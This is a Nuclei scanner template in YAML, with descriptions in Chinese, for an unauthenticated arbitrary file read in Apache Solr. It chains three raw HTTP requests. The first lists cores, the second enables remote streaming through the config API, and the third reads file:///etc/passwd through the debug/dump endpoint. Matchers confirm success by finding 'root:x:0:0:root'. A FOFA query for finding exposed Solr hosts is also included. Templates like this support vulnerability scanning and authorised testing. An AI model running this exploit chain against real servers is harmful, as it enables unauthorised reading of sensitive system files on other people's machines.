id: Apache-Solr-Config-Read-File
info:
  name: Apache Solr config 任意文件读取漏洞
  author: wjlin0
  severity: high
  description: Apache Solr 存在任意文件读取漏洞，攻击者可以在未授权的情况下获取目标服务器敏感文件
  metadata:
    fofa-query: 'app="APACHE-Solr"'
  reference:
    - http://wiki.peiqi.tech/wiki/webserver/Apache/Apache%20Solr%20config%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
    - https://github.com/YinWC/2021hvv_vul/blob/master/0409/apache%20Solr%20%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96.md
  tags: apache,solr,config,readfile,lfi
http:
  - raw:
      - |+
        GET /solr/admin/cores?wt=json HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
      - |+
        POST /solr/{{core}}/config HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        
        {"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
      - |+
        POST /solr/{{core}}/debug/dump?param=ContentStreams HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        
        stream.url=file:///etc/passwd
    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - responseHeader
          - status
          - QTime
          - WARNING
        condition: and
      - type: status
        status:
          - 200
      - type: word
        part: body_3
        words: 
          - stream
          - ContentStreams
          - root:x:0:0:root
          - httpMethod
        condition: and
    extractors:
      - type: regex
        part: body_1
        internal: true
        name: core
        group: 1
        regex:
          - '"name"\:"(.*?)"'
# digest: 490a004630440220516d00be982536e983d6c28c8b3fd64a5a3825c5002e7c045a76eec941c9ee8802200c4ecd1c7c859155b51e33a73c8b77e28c1fbbab2baa45e15093858ffca2b032:9d8cf424f0e932381bf27cf1e926b867